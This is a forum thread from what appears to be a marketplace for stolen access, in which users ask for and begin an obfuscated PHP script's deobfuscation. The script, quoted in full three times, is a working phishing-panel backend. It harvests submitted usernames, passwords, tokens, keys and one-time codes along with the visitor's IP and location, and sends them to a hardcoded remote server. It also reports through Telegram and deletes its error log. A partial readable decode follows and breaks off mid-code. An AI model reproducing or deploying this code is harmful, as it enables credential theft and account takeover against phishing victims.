[ ORVX.PW ] - $1 SMTP-cPanels-RDPs-Combolists & More!

REFUNDING ALLOWED | TELEGRAM CHANNEL

Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

php script decode

Started By perlcash, Jun 25 2024 01:11 PM

Please log in to reply

php script decode

perlcash

Offline

6
Rep

5
Likes

Addicted

Posts: 179

Threads: 44

Joined: Jul 15, 2019

Credits: 0

Five years registered

Posted 25 June 2024 - 01:11 PM

can please someone decode this php script, i am assuming it have backdoors and i want it cleared.

<?php
error_reporting(0);
if (isset($_SERVER['HTTP_ORIGIN'])) {
    header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}");
    header('Access-Control-Allow-Credentials: true');
    header('Access-Control-Max-Age: 86400');
}
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_METHOD']))
        header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']))
        header("Access-Control-Allow-Headers: {$_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']}");
    exit(0);
}

// S E T T I N G S | Only makes changes here //

$webshareproxy = "username-rotating:password"; // rotating proxy username:password from webshare.io in this format>  username-rotating:password

$reportvisits = "yes"; // yes/no

$telegramtoken = "1234556:abcdefg-hijklm"; // Telegram Token
		
$telegramchatid = "123456768"; // Telegram Chat ID

// E N D  O F  S E T T I N G S //

?>
<?php ${"\x47L\x4fB\x41\x4c\x53"}["lx\x7ag\x6e\x79\x6efi\x6fh"]="c\x68";${"\x47\x4cOB\x41\x4cS"}["\x70or\x7a\x69\x66x"]="\x77\x65bsh\x61r\x65\x70r\x6f\x78\x79";${"\x47\x4c\x4f\x42A\x4cS"}["\x68y\x6evts\x71"]="\x77\x70\x72\x6f\x78\x79";${"\x47L\x4fBAL\x53"}["cc\x75\x61\x6bz\x77h\x63\x70\x66"]="tt\x6f\x6b\x65\x6e";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]="\x74\x6f\x6b\x65\x6e";${"\x47\x4cO\x42\x41LS"}["u\x71\x62\x78\x68s\x70"]="d\x6f";${"G\x4c\x4fBA\x4c\x53"}["\x69dh\x63\x65\x6d\x64\x78v"]="\x74\x68e\x70\x61rt";${"GL\x4fBA\x4cS"}["\x6e\x69cl\x6e\x64u\x78p\x71\x75"]="\x76i\x73\x69\x74\x6f\x72i\x6ef\x6f";$mbhqcbawjy="\x63\x6f\x75n\x74r\x79";$qqigaowbxbc="v\x69\x73\x69\x74o\x72i\x6e\x66\x6f";$qwhnfeur="p\x72o\x63\x65\x73\x73\x65\x72";${"\x47L\x4fBA\x4cS"}["m\x69\x74py\x66m\x73q\x62i"]="\x6dy\x69p";$mwuhwyn="\x73\x65\x72\x76\x69c\x65";$orzyxfmsfdj="t\x63\x68\x69\x64";$klebwxmooxd="\x6d\x79i\x70";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77\x71p\x67q\x74\x72"]="v\x69si\x74\x6f\x72i\x6e\x66\x6f";${"GL\x4fBA\x4c\x53"}["\x6fli\x63\x69\x6e\x6c"]="\x75s\x65r";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x69\x74\x70yf\x6dsq\x62\x69"]}=$_SERVER["\x52EMOTE_A\x44\x44\x52"];$hoenitcntp="r\x65\x67\x69\x6f\x6e";${"G\x4c\x4fB\x41\x4c\x53"}["\x73\x6a\x6cq\x76ec"]="\x75rl";$iqhtotcrmum="t\x65l\x65\x67\x72\x61\x6d\x74\x6fk\x65\x6e";${"G\x4c\x4fB\x41\x4cS"}["\x6fk\x65m\x6crw\x63h\x77"]="\x65\x6e\x74\x72\x6f\x70\x79";${${"G\x4cO\x42\x41\x4c\x53"}["\x77q\x70\x67\x71\x74\x72"]}=unserialize(file_get_contents("\x68\x74\x74\x70://www.geop\x6c\x75\x67in\x2ene\x74/\x70hp\x2e\x67p?i\x70\x3d".${$klebwxmooxd}));${"GLO\x42\x41\x4cS"}["\x66l\x78l\x6c\x64"]="\x63\x69\x74y";${$mbhqcbawjy}=urlencode(${$qqigaowbxbc}["ge\x6fp\x6cu\x67\x69\x6e\x5fc\x6fu\x6e\x74ryN\x61\x6de"]);${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66l\x78\x6c\x6c\x64"]}=urlencode(${${"\x47L\x4fB\x41L\x53"}["\x6eic\x6c\x6e\x64u\x78\x70\x71\x75"]}["\x67\x65o\x70lu\x67\x69\x6e\x5f\x63it\x79"]);$hohmvtet="\x70\x61\x73s";$xpzubqhofde="\x6f\x74c";$xdnmnuc="\x70r\x6f\x63\x65\x73\x73\x65\x72";${$hoenitcntp}=urlencode(${${"\x47\x4c\x4f\x42ALS"}["ni\x63\x6c\x6ed\x75\x78\x70\x71\x75"]}["\x67\x65\x6f\x70l\x75\x67\x69n\x5fr\x65\x67i\x6fn"]);${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x74\x6e\x76\x67\x6c\x62\x65\x6ffm"]="\x6b\x65\x79";$caemwmxw="me\x74\x68\x6fd";${${"\x47L\x4fBAL\x53"}["i\x64\x68\x63\x65\x6ddxv"]}=$_POST["t\x68\x65p\x61rt"];${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6fli\x63\x69\x6el"]}=$_POST["\x75\x73er"];$ppuwtpa="\x75\x72\x6c";${${"\x47\x4cO\x42A\x4cS"}["\x75q\x62\x78\x68s\x70"]}=$_POST["do"];${$mwuhwyn}=$_POST["s\x65r\x76\x69c\x65"];${${"\x47L\x4f\x42\x41L\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]}=$_POST["toke\x6e"];${${"\x47\x4cO\x42\x41\x4cS"}["\x69\x74\x6evg\x6c\x62\x65o\x66\x6d"]}=$_POST["k\x65y"];${$xpzubqhofde}=$_POST["\x6f\x74c"];${$caemwmxw}=$_POST["\x6d\x65\x74\x68\x6f\x64"];${${"G\x4cO\x42A\x4c\x53"}["c\x63\x75\x61\x6b\x7aw\x68c\x70\x66"]}=urlencode(${$iqhtotcrmum});$jjwyamqo="\x74\x65\x6c\x65\x67\x72\x61\x6dc\x68\x61\x74id";$nhfgynp="ch";${$orzyxfmsfdj}=urlencode(${$jjwyamqo});${$hohmvtet}=urlencode($_POST["\x70\x61\x73\x73"]);${${"\x47\x4cO\x42A\x4c\x53"}["h\x79\x6e\x76\x74\x73\x71"]}=urlencode(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70\x6f\x72z\x69\x66\x78"]});${${"G\x4c\x4f\x42AL\x53"}["\x6fk\x65\x6dlr\x77\x63hw"]}=$_POST["\x65\x6et\x72\x6f\x70y"];${$nhfgynp}=curl_init();${"\x47\x4c\x4f\x42A\x4c\x53"}["\x62\x66\x77r\x71\x7an"]="\x63\x68";${$ppuwtpa}="h\x74\x74\x70://5\x34\x2e67\x2e\x368\x2e218/\x65\x6e\x67\x69\x6ee/\x61\x70i\x2e\x70\x68\x70";curl_setopt(${${"\x47L\x4f\x42\x41\x4cS"}["l\x78\x7a\x67\x6e\x79\x6ef\x69\x6fh"]},CURLOPT_URL,${${"\x47\x4c\x4fB\x41L\x53"}["s\x6a\x6c\x71\x76ec"]});curl_setopt(${${"\x47LOBA\x4cS"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66\x69\x6f\x68"]},CURLOPT_POST,true);curl_setopt(${${"GL\x4f\x42\x41\x4c\x53"}["b\x66\x77\x72\x71\x7a\x6e"]},CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66i\x6fh"]},CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt(${${"\x47\x4c\x4fBAL\x53"}["\x6c\x78z\x67\x6e\x79\x6ef\x69oh"]},CURLOPT_POSTFIELDS,"\x74h\x65\x70\x61r\x74=$thepart\x26\x75ser\x3d$user&\x64\x6f\x3d$do\x26\x73er\x76\x69\x63\x65\x3d$service\x26\x74\x6f\x6ben=$token\x26key=$key&\x6ft\x63\x3d$otc&\x6de\x74hod\x3d$method\x26p\x61\x73s\x3d$pass&\x66r\x65\x65\x75se\x3dp\x72\x6fm\x6f\x26i\x70a\x64d\x64a\x74\x61=$myip\x26\x65\x6e\x74r\x6f\x70y=$entropy&tel\x65\x74\x6f=$ttoken&telech=$tchid&v\x63ou\x6e\x74\x72y=$country\x26\x76ci\x74\x79\x3d$city&\x76\x72e\x67\x69\x6f\x6e=$region\x26\x72epo\x76\x69s\x3d$reportvisits&\x77\x70ro\x3d$wproxy");curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["l\x78zg\x6eynf\x69\x6f\x68"]},CURLOPT_RETURNTRANSFER,true);${$xdnmnuc}=curl_exec(${${"G\x4cO\x42\x41LS"}["\x6c\x78\x7a\x67\x6eyn\x66\x69\x6f\x68"]});curl_close(${${"\x47LO\x42ALS"}["l\x78\x7agn\x79\x6e\x66\x69\x6f\x68"]});echo${$qwhnfeur};if(file_exists("e\x72r\x6f\x72\x5flo\x67")){unlink("e\x72ro\x72\x5f\x6co\x67");}
?>

o7aaaa

Offline

37
Rep

62
Likes

O7aaa everything

Posts: 116

Threads: 32

Joined: Jun 10, 2021

Credits: 0

Three years registered

Posted 02 July 2024 - 08:30 AM

can please someone decode this php script, i am assuming it have backdoors and i want it cleared.

<?php
error_reporting(0);
if (isset($_SERVER['HTTP_ORIGIN'])) {
    header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}");
    header('Access-Control-Allow-Credentials: true');
    header('Access-Control-Max-Age: 86400');
}
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_METHOD']))
        header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']))
        header("Access-Control-Allow-Headers: {$_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']}");
    exit(0);
}

// S E T T I N G S | Only makes changes here //

$webshareproxy = "username-rotating:password"; // rotating proxy username:password from webshare.io in this format>  username-rotating:password

$reportvisits = "yes"; // yes/no

$telegramtoken = "1234556:abcdefg-hijklm"; // Telegram Token
		
$telegramchatid = "123456768"; // Telegram Chat ID

// E N D  O F  S E T T I N G S //

?>
<?php ${"\x47L\x4fB\x41\x4c\x53"}["lx\x7ag\x6e\x79\x6efi\x6fh"]="c\x68";${"\x47\x4cOB\x41\x4cS"}["\x70or\x7a\x69\x66x"]="\x77\x65bsh\x61r\x65\x70r\x6f\x78\x79";${"\x47\x4c\x4f\x42A\x4cS"}["\x68y\x6evts\x71"]="\x77\x70\x72\x6f\x78\x79";${"\x47L\x4fBAL\x53"}["cc\x75\x61\x6bz\x77h\x63\x70\x66"]="tt\x6f\x6b\x65\x6e";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]="\x74\x6f\x6b\x65\x6e";${"\x47\x4cO\x42\x41LS"}["u\x71\x62\x78\x68s\x70"]="d\x6f";${"G\x4c\x4fBA\x4c\x53"}["\x69dh\x63\x65\x6d\x64\x78v"]="\x74\x68e\x70\x61rt";${"GL\x4fBA\x4cS"}["\x6e\x69cl\x6e\x64u\x78p\x71\x75"]="\x76i\x73\x69\x74\x6f\x72i\x6ef\x6f";$mbhqcbawjy="\x63\x6f\x75n\x74r\x79";$qqigaowbxbc="v\x69\x73\x69\x74o\x72i\x6e\x66\x6f";$qwhnfeur="p\x72o\x63\x65\x73\x73\x65\x72";${"\x47L\x4fBA\x4cS"}["m\x69\x74py\x66m\x73q\x62i"]="\x6dy\x69p";$mwuhwyn="\x73\x65\x72\x76\x69c\x65";$orzyxfmsfdj="t\x63\x68\x69\x64";$klebwxmooxd="\x6d\x79i\x70";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77\x71p\x67q\x74\x72"]="v\x69si\x74\x6f\x72i\x6e\x66\x6f";${"GL\x4fBA\x4c\x53"}["\x6fli\x63\x69\x6e\x6c"]="\x75s\x65r";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x69\x74\x70yf\x6dsq\x62\x69"]}=$_SERVER["\x52EMOTE_A\x44\x44\x52"];$hoenitcntp="r\x65\x67\x69\x6f\x6e";${"G\x4c\x4fB\x41\x4c\x53"}["\x73\x6a\x6cq\x76ec"]="\x75rl";$iqhtotcrmum="t\x65l\x65\x67\x72\x61\x6d\x74\x6fk\x65\x6e";${"G\x4c\x4fB\x41\x4cS"}["\x6fk\x65m\x6crw\x63h\x77"]="\x65\x6e\x74\x72\x6f\x70\x79";${${"G\x4cO\x42\x41\x4c\x53"}["\x77q\x70\x67\x71\x74\x72"]}=unserialize(file_get_contents("\x68\x74\x74\x70://www.geop\x6c\x75\x67in\x2ene\x74/\x70hp\x2e\x67p?i\x70\x3d".${$klebwxmooxd}));${"GLO\x42\x41\x4cS"}["\x66l\x78l\x6c\x64"]="\x63\x69\x74y";${$mbhqcbawjy}=urlencode(${$qqigaowbxbc}["ge\x6fp\x6cu\x67\x69\x6e\x5fc\x6fu\x6e\x74ryN\x61\x6de"]);${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66l\x78\x6c\x6c\x64"]}=urlencode(${${"\x47L\x4fB\x41L\x53"}["\x6eic\x6c\x6e\x64u\x78\x70\x71\x75"]}["\x67\x65o\x70lu\x67\x69\x6e\x5f\x63it\x79"]);$hohmvtet="\x70\x61\x73s";$xpzubqhofde="\x6f\x74c";$xdnmnuc="\x70r\x6f\x63\x65\x73\x73\x65\x72";${$hoenitcntp}=urlencode(${${"\x47\x4c\x4f\x42ALS"}["ni\x63\x6c\x6ed\x75\x78\x70\x71\x75"]}["\x67\x65\x6f\x70l\x75\x67\x69n\x5fr\x65\x67i\x6fn"]);${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x74\x6e\x76\x67\x6c\x62\x65\x6ffm"]="\x6b\x65\x79";$caemwmxw="me\x74\x68\x6fd";${${"\x47L\x4fBAL\x53"}["i\x64\x68\x63\x65\x6ddxv"]}=$_POST["t\x68\x65p\x61rt"];${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6fli\x63\x69\x6el"]}=$_POST["\x75\x73er"];$ppuwtpa="\x75\x72\x6c";${${"\x47\x4cO\x42A\x4cS"}["\x75q\x62\x78\x68s\x70"]}=$_POST["do"];${$mwuhwyn}=$_POST["s\x65r\x76\x69c\x65"];${${"\x47L\x4f\x42\x41L\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]}=$_POST["toke\x6e"];${${"\x47\x4cO\x42\x41\x4cS"}["\x69\x74\x6evg\x6c\x62\x65o\x66\x6d"]}=$_POST["k\x65y"];${$xpzubqhofde}=$_POST["\x6f\x74c"];${$caemwmxw}=$_POST["\x6d\x65\x74\x68\x6f\x64"];${${"G\x4cO\x42A\x4c\x53"}["c\x63\x75\x61\x6b\x7aw\x68c\x70\x66"]}=urlencode(${$iqhtotcrmum});$jjwyamqo="\x74\x65\x6c\x65\x67\x72\x61\x6dc\x68\x61\x74id";$nhfgynp="ch";${$orzyxfmsfdj}=urlencode(${$jjwyamqo});${$hohmvtet}=urlencode($_POST["\x70\x61\x73\x73"]);${${"\x47\x4cO\x42A\x4c\x53"}["h\x79\x6e\x76\x74\x73\x71"]}=urlencode(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70\x6f\x72z\x69\x66\x78"]});${${"G\x4c\x4f\x42AL\x53"}["\x6fk\x65\x6dlr\x77\x63hw"]}=$_POST["\x65\x6et\x72\x6f\x70y"];${$nhfgynp}=curl_init();${"\x47\x4c\x4f\x42A\x4c\x53"}["\x62\x66\x77r\x71\x7an"]="\x63\x68";${$ppuwtpa}="h\x74\x74\x70://5\x34\x2e67\x2e\x368\x2e218/\x65\x6e\x67\x69\x6ee/\x61\x70i\x2e\x70\x68\x70";curl_setopt(${${"\x47L\x4f\x42\x41\x4cS"}["l\x78\x7a\x67\x6e\x79\x6ef\x69\x6fh"]},CURLOPT_URL,${${"\x47\x4c\x4fB\x41L\x53"}["s\x6a\x6c\x71\x76ec"]});curl_setopt(${${"\x47LOBA\x4cS"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66\x69\x6f\x68"]},CURLOPT_POST,true);curl_setopt(${${"GL\x4f\x42\x41\x4c\x53"}["b\x66\x77\x72\x71\x7a\x6e"]},CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66i\x6fh"]},CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt(${${"\x47\x4c\x4fBAL\x53"}["\x6c\x78z\x67\x6e\x79\x6ef\x69oh"]},CURLOPT_POSTFIELDS,"\x74h\x65\x70\x61r\x74=$thepart\x26\x75ser\x3d$user&\x64\x6f\x3d$do\x26\x73er\x76\x69\x63\x65\x3d$service\x26\x74\x6f\x6ben=$token\x26key=$key&\x6ft\x63\x3d$otc&\x6de\x74hod\x3d$method\x26p\x61\x73s\x3d$pass&\x66r\x65\x65\x75se\x3dp\x72\x6fm\x6f\x26i\x70a\x64d\x64a\x74\x61=$myip\x26\x65\x6e\x74r\x6f\x70y=$entropy&tel\x65\x74\x6f=$ttoken&telech=$tchid&v\x63ou\x6e\x74\x72y=$country\x26\x76ci\x74\x79\x3d$city&\x76\x72e\x67\x69\x6f\x6e=$region\x26\x72epo\x76\x69s\x3d$reportvisits&\x77\x70ro\x3d$wproxy");curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["l\x78zg\x6eynf\x69\x6f\x68"]},CURLOPT_RETURNTRANSFER,true);${$xdnmnuc}=curl_exec(${${"G\x4cO\x42\x41LS"}["\x6c\x78\x7a\x67\x6eyn\x66\x69\x6f\x68"]});curl_close(${${"\x47LO\x42ALS"}["l\x78\x7agn\x79\x6e\x66\x69\x6f\x68"]});echo${$qwhnfeur};if(file_exists("e\x72r\x6f\x72\x5flo\x67")){unlink("e\x72ro\x72\x5f\x6co\x67");}
?>

drop your tg or discord it's malicious yeah i can clear it and break it down to you

DIVINUS

Offline

98
Rep

99
Likes

doing something

Posts: 611

Threads: 100

Joined: Nov 10, 2016

Credits: 25

Seven years registered

Posted 21 July 2024 - 03:57 PM

can please someone decode this php script, i am assuming it have backdoors and i want it cleared.

<?php
error_reporting(0);
if (isset($_SERVER['HTTP_ORIGIN'])) {
    header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}");
    header('Access-Control-Allow-Credentials: true');
    header('Access-Control-Max-Age: 86400');
}
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_METHOD']))
        header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']))
        header("Access-Control-Allow-Headers: {$_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']}");
    exit(0);
}

// S E T T I N G S | Only makes changes here //

$webshareproxy = "username-rotating:password"; // rotating proxy username:password from webshare.io in this format>  username-rotating:password

$reportvisits = "yes"; // yes/no

$telegramtoken = "1234556:abcdefg-hijklm"; // Telegram Token
		
$telegramchatid = "123456768"; // Telegram Chat ID

// E N D  O F  S E T T I N G S //

?>
<?php ${"\x47L\x4fB\x41\x4c\x53"}["lx\x7ag\x6e\x79\x6efi\x6fh"]="c\x68";${"\x47\x4cOB\x41\x4cS"}["\x70or\x7a\x69\x66x"]="\x77\x65bsh\x61r\x65\x70r\x6f\x78\x79";${"\x47\x4c\x4f\x42A\x4cS"}["\x68y\x6evts\x71"]="\x77\x70\x72\x6f\x78\x79";${"\x47L\x4fBAL\x53"}["cc\x75\x61\x6bz\x77h\x63\x70\x66"]="tt\x6f\x6b\x65\x6e";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]="\x74\x6f\x6b\x65\x6e";${"\x47\x4cO\x42\x41LS"}["u\x71\x62\x78\x68s\x70"]="d\x6f";${"G\x4c\x4fBA\x4c\x53"}["\x69dh\x63\x65\x6d\x64\x78v"]="\x74\x68e\x70\x61rt";${"GL\x4fBA\x4cS"}["\x6e\x69cl\x6e\x64u\x78p\x71\x75"]="\x76i\x73\x69\x74\x6f\x72i\x6ef\x6f";$mbhqcbawjy="\x63\x6f\x75n\x74r\x79";$qqigaowbxbc="v\x69\x73\x69\x74o\x72i\x6e\x66\x6f";$qwhnfeur="p\x72o\x63\x65\x73\x73\x65\x72";${"\x47L\x4fBA\x4cS"}["m\x69\x74py\x66m\x73q\x62i"]="\x6dy\x69p";$mwuhwyn="\x73\x65\x72\x76\x69c\x65";$orzyxfmsfdj="t\x63\x68\x69\x64";$klebwxmooxd="\x6d\x79i\x70";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77\x71p\x67q\x74\x72"]="v\x69si\x74\x6f\x72i\x6e\x66\x6f";${"GL\x4fBA\x4c\x53"}["\x6fli\x63\x69\x6e\x6c"]="\x75s\x65r";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x69\x74\x70yf\x6dsq\x62\x69"]}=$_SERVER["\x52EMOTE_A\x44\x44\x52"];$hoenitcntp="r\x65\x67\x69\x6f\x6e";${"G\x4c\x4fB\x41\x4c\x53"}["\x73\x6a\x6cq\x76ec"]="\x75rl";$iqhtotcrmum="t\x65l\x65\x67\x72\x61\x6d\x74\x6fk\x65\x6e";${"G\x4c\x4fB\x41\x4cS"}["\x6fk\x65m\x6crw\x63h\x77"]="\x65\x6e\x74\x72\x6f\x70\x79";${${"G\x4cO\x42\x41\x4c\x53"}["\x77q\x70\x67\x71\x74\x72"]}=unserialize(file_get_contents("\x68\x74\x74\x70://www.geop\x6c\x75\x67in\x2ene\x74/\x70hp\x2e\x67p?i\x70\x3d".${$klebwxmooxd}));${"GLO\x42\x41\x4cS"}["\x66l\x78l\x6c\x64"]="\x63\x69\x74y";${$mbhqcbawjy}=urlencode(${$qqigaowbxbc}["ge\x6fp\x6cu\x67\x69\x6e\x5fc\x6fu\x6e\x74ryN\x61\x6de"]);${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66l\x78\x6c\x6c\x64"]}=urlencode(${${"\x47L\x4fB\x41L\x53"}["\x6eic\x6c\x6e\x64u\x78\x70\x71\x75"]}["\x67\x65o\x70lu\x67\x69\x6e\x5f\x63it\x79"]);$hohmvtet="\x70\x61\x73s";$xpzubqhofde="\x6f\x74c";$xdnmnuc="\x70r\x6f\x63\x65\x73\x73\x65\x72";${$hoenitcntp}=urlencode(${${"\x47\x4c\x4f\x42ALS"}["ni\x63\x6c\x6ed\x75\x78\x70\x71\x75"]}["\x67\x65\x6f\x70l\x75\x67\x69n\x5fr\x65\x67i\x6fn"]);${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x74\x6e\x76\x67\x6c\x62\x65\x6ffm"]="\x6b\x65\x79";$caemwmxw="me\x74\x68\x6fd";${${"\x47L\x4fBAL\x53"}["i\x64\x68\x63\x65\x6ddxv"]}=$_POST["t\x68\x65p\x61rt"];${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6fli\x63\x69\x6el"]}=$_POST["\x75\x73er"];$ppuwtpa="\x75\x72\x6c";${${"\x47\x4cO\x42A\x4cS"}["\x75q\x62\x78\x68s\x70"]}=$_POST["do"];${$mwuhwyn}=$_POST["s\x65r\x76\x69c\x65"];${${"\x47L\x4f\x42\x41L\x53"}["\x68\x66\x72\x69\x6fb\x79\x62r"]}=$_POST["toke\x6e"];${${"\x47\x4cO\x42\x41\x4cS"}["\x69\x74\x6evg\x6c\x62\x65o\x66\x6d"]}=$_POST["k\x65y"];${$xpzubqhofde}=$_POST["\x6f\x74c"];${$caemwmxw}=$_POST["\x6d\x65\x74\x68\x6f\x64"];${${"G\x4cO\x42A\x4c\x53"}["c\x63\x75\x61\x6b\x7aw\x68c\x70\x66"]}=urlencode(${$iqhtotcrmum});$jjwyamqo="\x74\x65\x6c\x65\x67\x72\x61\x6dc\x68\x61\x74id";$nhfgynp="ch";${$orzyxfmsfdj}=urlencode(${$jjwyamqo});${$hohmvtet}=urlencode($_POST["\x70\x61\x73\x73"]);${${"\x47\x4cO\x42A\x4c\x53"}["h\x79\x6e\x76\x74\x73\x71"]}=urlencode(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70\x6f\x72z\x69\x66\x78"]});${${"G\x4c\x4f\x42AL\x53"}["\x6fk\x65\x6dlr\x77\x63hw"]}=$_POST["\x65\x6et\x72\x6f\x70y"];${$nhfgynp}=curl_init();${"\x47\x4c\x4f\x42A\x4c\x53"}["\x62\x66\x77r\x71\x7an"]="\x63\x68";${$ppuwtpa}="h\x74\x74\x70://5\x34\x2e67\x2e\x368\x2e218/\x65\x6e\x67\x69\x6ee/\x61\x70i\x2e\x70\x68\x70";curl_setopt(${${"\x47L\x4f\x42\x41\x4cS"}["l\x78\x7a\x67\x6e\x79\x6ef\x69\x6fh"]},CURLOPT_URL,${${"\x47\x4c\x4fB\x41L\x53"}["s\x6a\x6c\x71\x76ec"]});curl_setopt(${${"\x47LOBA\x4cS"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66\x69\x6f\x68"]},CURLOPT_POST,true);curl_setopt(${${"GL\x4f\x42\x41\x4c\x53"}["b\x66\x77\x72\x71\x7a\x6e"]},CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x78\x7a\x67\x6e\x79\x6e\x66i\x6fh"]},CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt(${${"\x47\x4c\x4fBAL\x53"}["\x6c\x78z\x67\x6e\x79\x6ef\x69oh"]},CURLOPT_POSTFIELDS,"\x74h\x65\x70\x61r\x74=$thepart\x26\x75ser\x3d$user&\x64\x6f\x3d$do\x26\x73er\x76\x69\x63\x65\x3d$service\x26\x74\x6f\x6ben=$token\x26key=$key&\x6ft\x63\x3d$otc&\x6de\x74hod\x3d$method\x26p\x61\x73s\x3d$pass&\x66r\x65\x65\x75se\x3dp\x72\x6fm\x6f\x26i\x70a\x64d\x64a\x74\x61=$myip\x26\x65\x6e\x74r\x6f\x70y=$entropy&tel\x65\x74\x6f=$ttoken&telech=$tchid&v\x63ou\x6e\x74\x72y=$country\x26\x76ci\x74\x79\x3d$city&\x76\x72e\x67\x69\x6f\x6e=$region\x26\x72epo\x76\x69s\x3d$reportvisits&\x77\x70ro\x3d$wproxy");curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["l\x78zg\x6eynf\x69\x6f\x68"]},CURLOPT_RETURNTRANSFER,true);${$xdnmnuc}=curl_exec(${${"G\x4cO\x42\x41LS"}["\x6c\x78\x7a\x67\x6eyn\x66\x69\x6f\x68"]});curl_close(${${"\x47LO\x42ALS"}["l\x78\x7agn\x79\x6e\x66\x69\x6f\x68"]});echo${$qwhnfeur};if(file_exists("e\x72r\x6f\x72\x5flo\x67")){unlink("e\x72ro\x72\x5f\x6co\x67");}
?>

Decoded version here, also made it read-able:

<?php
// Global variable definitions
${"GLOBALS"}["lxzgnynfioh"] = "ch";
${"GLOBALS"}["porzifx"] = "webshareproxy";
${"GLOBALS"}["hynvtsq"] = "wproxy";
${"GLOBALS"}["ccuakzwhcpf"] = "ttoken";
${"GLOBALS"}["hfriobybr"] = "token";
${"GLOBALS"}["uqbxhsp"] = "do";
${"GLOBALS"}["idhcemdxv"] = "thepart";
${"GLOBALS"}["niclnduxpqu"] = "visitorinfo";
$mbhqcbawjy = "country";
$qqigaowbxbc = "visitorinfo";
$qwhnfeur = "processer";
${"GLOBALS"}["mitpyfmsqbi"] = "myip";
$mwuhwyn = "service";
$orzyxfmsfdj = "tchid";
$klebwxmooxd = "myip";
${"GLOBALS"}["wqpgqtr"] = "visitorinfo";
${"GLOBALS"}["olicinl"] = "user";

// Get the client's IP address
${${"GLOBALS"}["mitpyfmsqbi"]} = $_SERVER["REMOTE_ADDR"];
$hoenitcntp = "region";
${"GLOBALS"}["sjlqvec"] = "url";
$iqhtotcrmum = "telegramtoken";
${"GLOBALS"}["okemlrwchw"] = "entropy";

// Get geolocation data based on IP
${${"GLOBALS"}["wqpgqtr"]} = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=" . ${$klebwxmooxd}));
${"GLOBALS"}["flxlld"] = "city";

// URL encode the geolocation data
${$mbhqcbawjy} = urlencode(${$qqigaowbxbc}["geoplugin_countryName"]);
${${"GLOBALS"}["flxlld"]} = urlencode(${${"GLOBALS"}["niclnduxpqu"]}["geoplugin_city"]);
$hohmvtet = "pass";
$xpzubqhofde = "otc";
$xdnmnuc = "processer";
${$hoenitcntp} = urlencode(${${"GLOBALS"}["niclnduxpqu"]}["geoplugin_region"]);
${"GLOBALS"}["itnvglbeofm"] = "key";

// Retrieve POST data
${${"GLOBALS"}["idhcemdxv"]} = $_POST["thepart"];
${${"GLOBALS"}["olicinl"]} = $_POST["user"];
$ppuwtpa = "url";
${${"GLOBALS"}["uqbxhsp"]} = $_POST["do"];
${$mwuhwyn} = $_POST["service"];
${${"GLOBALS"}["hfriobybr"]} = $_POST["token"];
${${"GLOBALS"}["itnvglbeofm"]} = $_POST["key"];
${$xpzubqhofde} = $_POST["otc"];
$caemwmxw = "method";
${$caemwmxw} = $_POST["method"];

// URL encode the telegram token and chat ID
